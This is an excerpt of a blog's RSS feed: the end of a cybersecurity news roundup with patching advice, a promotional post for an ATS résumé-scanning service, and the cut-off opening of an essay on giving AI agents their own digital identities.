type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!FTvl!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!FTvl!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!FTvl!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!FTvl!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!FTvl!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!FTvl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:277121,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200279635?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!FTvl!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!FTvl!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!FTvl!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!FTvl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>Palo Alto GlobalProtect Authentication Bypass Under Active Exploitation (CVE-2026-0257)</h3><p>Palo Alto Networks&#8217; GlobalProtect VPN solution, widely used for secure remote access, is facing active exploitation of a critical authentication bypass vulnerability. Attackers can forge authentication cookies using the exposed HTTPS certificate public key, gaining full VPN access without valid credentials.</p><p>This flaw (CVE-2026-0257) has been exploited in the wild since mid-May, with CISA adding it to the Known Exploited Vulnerabilities (KEV) catalog. Organizations relying on PAN-OS for perimeter defense should prioritize patching immediately. Workarounds include restricting GlobalProtect portal access to trusted IPs and enforcing multi-factor authentication (MFA) where possible.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p><strong>Key Takeaway:</strong> VPNs are prime targets for initial access. Delayed patching here can lead to full network compromise. Review your exposure and test failover configurations.</p><h3>WP Maps Pro WordPress Plugin Vulnerability Enables Unauthenticated Admin Takeovers</h3><p>A severe flaw in the WP Maps Pro WordPress plugin (CVE-2026-8732) allows unauthenticated attackers to create rogue administrator accounts on vulnerable sites. This gives attackers full control to install backdoors, deface sites, or use them for further attacks.</p><p>WordPress powers a massive portion of the web, making plugin vulnerabilities especially dangerous for businesses, agencies, and personal sites. Multiple other WordPress plugin issues (XSS, CSRF) surfaced around the same time, highlighting ongoing risks in the ecosystem.</p><p><strong>Key Takeaway:</strong> Keep plugins updated aggressively and audit admin users regularly. Consider security plugins or WAFs for added protection on public-facing sites. If running WP Maps Pro, update now and scan for suspicious accounts.</p><h3>Dashlane Brute-Force Attacks Result in Limited Encrypted Vault Access</h3><p>Password manager Dashlane disclosed a brute-force campaign targeting user accounts. While most attempts were thwarted by rate-limiting and account locking, encrypted vaults for fewer than 20 users were downloaded.</p><p>This incident underscores that even established credential managers aren&#8217;t immune to persistent attacks. Users should ensure strong, unique master passwords and enable all available security features like breach monitoring.</p><p><strong>Key Takeaway:</strong> Password managers reduce risk but aren&#8217;t set-it-and-forget-it. Monitor for unusual activity, rotate master passwords periodically, and combine with hardware keys or passkeys where supported.</p><h3>Miasma Supply Chain Attack Compromises Red Hat npm Packages</h3><p>Hackers published dozens of malicious versions of Red Hat npm packages, injecting a credential-stealing worm (similar to prior campaigns like Mini Shai-Hulud). This affected the software supply chain, targeting developers and organizations using these packages.</p><p>Supply chain attacks continue to rise as attackers shift left to compromise builds and dependencies before deployment.</p><p><strong>Key Takeaway:</strong> Vet dependencies, use tools like npm audit, lockfile verification, and SBOMs. Organizations should scan for compromised packages and isolate build environments.</p><h3>Additional Quick Notes</h3><ul><li><p>Linux kernel and other privilege escalation flaws (e.g., related to CIFS or printing software) continue circulating, emphasizing the need for timely OS patching.</p></li><li><p>Broader trends include AI-assisted phishing, cloud secret theft, and targeting of developer tools.</p></li></ul><p><strong>Overall Advice:</strong> Patch relentlessly, monitor for anomalous auth attempts, harden supply chains, and maintain good backup/segmentation hygiene. Cybersecurity remains a cat-and-mouse game&#8212;staying proactive on the basics gives you the edge. Stay safe out there.</p><p></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Past the Bots: Finally Making Applicant Tracking Systems Work for You Instead of Against You]]></title><description><![CDATA[Because getting rejected by robots is even more depressing than getting rejected by humans.]]></description><link>https://rodtrent.substack.com/p/past-the-bots-finally-making-applicant</link><guid isPermaLink="false">https://rodtrent.substack.com/p/past-the-bots-finally-making-applicant</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Tue, 02 Jun 2026 15:01:41 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!1Ud_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!1Ud_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!1Ud_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png 424w, https://substackcdn.com/image/fetch/$s_!1Ud_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png 848w, https://substackcdn.com/image/fetch/$s_!1Ud_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png 1272w, https://substackcdn.com/image/fetch/$s_!1Ud_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!1Ud_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png" width="1456" height="819" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:819,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:136007,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/199860266?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!1Ud_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png 424w, https://substackcdn.com/image/fetch/$s_!1Ud_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png 848w, https://substackcdn.com/image/fetch/$s_!1Ud_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png 1272w, https://substackcdn.com/image/fetch/$s_!1Ud_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff29f3de8-270e-42b0-baf6-f9733064e42f_1600x900.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In today&#8217;s job market, applying isn&#8217;t the hard part&#8212;getting seen is.</p><p>According to recent reports, <strong>75% of r&#233;sum&#233;s never reach a human recruiter</strong>. They&#8217;re filtered out by Applicant Tracking Systems (ATS) like Workday, Greenhouse, Taleo, iCIMS, and Lever long before anyone reads them. These systems were meant to help companies manage high volumes of applications, but they&#8217;ve created a broken black box where even strong candidates get rejected for formatting issues, keyword gaps, or parsing failures.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p>The real frustration? Job hunting has quietly become a &#8220;who you know&#8221; game again&#8212;except now the gatekeepers are algorithms instead of old-school networks.</p><h3>Introducing Past the Bots</h3><p><strong>Past the Bots</strong> (pastthebots.com) is a new platform that makes the invisible ATS layer visible. It shows you exactly what the bots see, why your r&#233;sum&#233; gets filtered, and how to fix it&#8212;<strong>without ever fabricating experience</strong>.</p><p>Built around a single deterministic parsing engine that serves job seekers, recruiters, and curious professionals, Past the Bots combines transparency, practical fixes, and responsible AI tools to help great candidates get past the machines.</p><h3>What Past the Bots Does for Job Seekers</h3><p>The core experience starts with the <strong>R&#233;sum&#233; Scan</strong> tool:</p><ul><li><p><strong>Parse Health Score</strong> + &#8220;What the Bot Saw&#8221; &#8212; See the exact data the ATS extracts: names, contact info, skills, sections, and more.</p></li><li><p><strong>Issue List</strong> &#8212; Clear flags for common killers like scrambled columns, text-in-images, tables, and inconsistent formatting, with plain-English fix suggestions.</p></li><li><p><strong>Job Description Match</strong> &#8212; Paste a JD to get a weighted skill match score, matched/missing keywords, and gap analysis.</p></li><li><p><strong>AI-Tailored R&#233;sum&#233;</strong> &#8212; Generates a complete, honest, ATS-optimized r&#233;sum&#233; from your real experience (downloadable as .docx).</p></li><li><p><strong>Cover Letter + Outreach</strong> &#8212; Get a tailored cover letter, email subject line, and short LinkedIn/outreach message.</p></li><li><p><strong>ATS-Safe Rebuild</strong> &#8212; One-click clean single-column version structured the way parsers expect.</p></li></ul><p>There&#8217;s also a <strong>Live Editor</strong> where you can write or paste text and watch your completeness and JD-match scores update in real time. Missing keyword chips and an essentials checklist help you iterate quickly. Everything auto-saves in your browser.</p><p>New visitors can try a <strong>full sample report</strong> with no signup to see the value immediately.</p><h3>Tools for Recruiters and Hiring Teams</h3><p>Past the Bots isn&#8217;t just for candidates. The <strong>Recruiter dashboard</strong> lets teams:</p><ul><li><p>Bulk-screen r&#233;sum&#233;s against a single job description</p></li><li><p>Spot <strong>false rejects</strong> &#8212; strong candidates the ATS would wrongly filter</p></li><li><p>Get ranked matches and knockout checks</p></li><li><p>Work within metered monthly volume</p></li></ul><p>This helps companies find better talent instead of missing it due to rigid automation.</p><h3>Free Transparency Tool: Audit the Bots</h3><p>Want to test how fragile your current r&#233;sum&#233; is? Use the free <strong>Audit the Bots</strong> tool. Upload your r&#233;sum&#233; and see how three different parsing strategies interpret it. This reveals whether your file is stable across systems or a coin flip for different ATS platforms&#8212;no account required.</p><h3>Chrome Extension</h3><p>For active job hunters, the <strong>Chrome extension</strong> offers one-click scanning. While viewing a job on LinkedIn, Indeed, or Greenhouse, get an instant match score and missing keywords inline.</p><h3>Pricing That Makes Sense</h3><ul><li><p><strong>Free</strong>: 1 full check/month, parse health, live editor, extension, unlimited audits</p></li><li><p><strong>Job-Hunt Pass</strong> ($29/3 months): Unlimited checks + AI r&#233;sum&#233; builder, cover letters, exports, and gap analysis</p></li><li><p><strong>Team</strong> ($149/seat/month): Bulk screening, false-reject flagging, ranked matching</p></li><li><p><strong>Business</strong>: Custom plans with SSO, API, shared workspaces, and higher volume</p></li></ul><h3>Built with Care and Transparency</h3><p>Past the Bots uses a deterministic engine (no constant API costs) for parsing and structure, with Anthropic&#8217;s Claude Sonnet powering the responsible AI features. Strict prompts prevent experience fabrication, and r&#233;sum&#233;s are processed in-memory without long-term storage. Privacy and honesty are core to the product.</p><h3>The Bigger Picture</h3><p>Job searching shouldn&#8217;t feel like gambling with formatting tricks. The best candidates deserve a fair shot, and companies deserve to see them.</p><p>Past the Bots aims to restore some sanity to the process by shining a light on the black box, giving actionable insights, and helping both sides of the hiring table work better.</p><p>Ready to see what the bots see?</p><p>&#128073; <strong><a href="https://pastthebots.com/">Try Past the Bots for free</a></strong></p><p>Whether you&#8217;re actively job hunting, helping your team hire, or just curious how your r&#233;sum&#233; holds up, the platform is live and ready to help you get <strong>Past the Bots</strong>.</p><div><hr></div><p><em>Built by someone tired of watching great people get filtered out by broken systems.</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[AI Agents Aren’t Tools Anymore. They’re Your New Digital Employees]]></title><description><![CDATA[Now with their own Slack accounts, performance reviews, and suspiciously good excuses for missing happy hour.]]></description><link>https://rodtrent.substack.com/p/ai-agents-arent-tools-anymore-theyre</link><guid isPermaLink="false">https://rodtrent.substack.com/p/ai-agents-arent-tools-anymore-theyre</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Tue, 02 Jun 2026 12:02:14 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!2W52!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2W52!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2W52!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!2W52!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!2W52!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!2W52!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2W52!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:324246,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/197253099?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!2W52!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!2W52!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!2W52!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!2W52!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f9a610a-3ea5-415b-92f5-6d9ef41bc8f7_1168x784.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In 2026, the hottest topic in boardrooms isn&#8217;t just &#8220;How do we use AI?&#8221; It&#8217;s &#8220;How do we manage AI agents like actual team members?&#8221;</p><p>Forget clunky chatbots or simple automation scripts. Today&#8217;s AI agents are autonomous, goal-oriented systems that plan, reason, use tools, collaborate across platforms, and act on behalf of your organization, often without constant human supervision. And here&#8217;s the key reason organizations are (or should be) treating them as employees: each agent operates with its own distinct digital identity.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p>These aren&#8217;t anonymous background processes anymore. They have names, credentials, access rights, memory, and the ability to delegate tasks to other agents. In short, they behave like digital coworkers. Ignoring that reality is creating security headaches, governance gaps, and missed opportunities.</p><h3>The Identity Shift: From Software to First-Class Citizens</h3><p>Traditional identity and access management (IAM) was built for humans and predictable workloads. AI agents break that mold.</p><p>Recent research from Gravitee found that while nearly 90% of organizations have experienced suspected or confirmed security incidents involving AI agents, only 22% treat those agents as independent identities. Most still lump them in with generic service accounts or run them under human credentials.</p><p>Leading platforms are changing that. Microsoft Entra ID now supports dedicated identities for agents. Okta, Aembit, and others talk about &#8220;non-human identities&#8221; (NHIs) or &#8220;agentic identities&#8221; that include verifiable credentials, scoped permissions, and full lifecycle governance, just like onboarding a new hire.</p><p>Some companies are going even further: giving AI agents their own email addresses, Slack/Teams accounts, and collaboration tools so they can interact naturally with 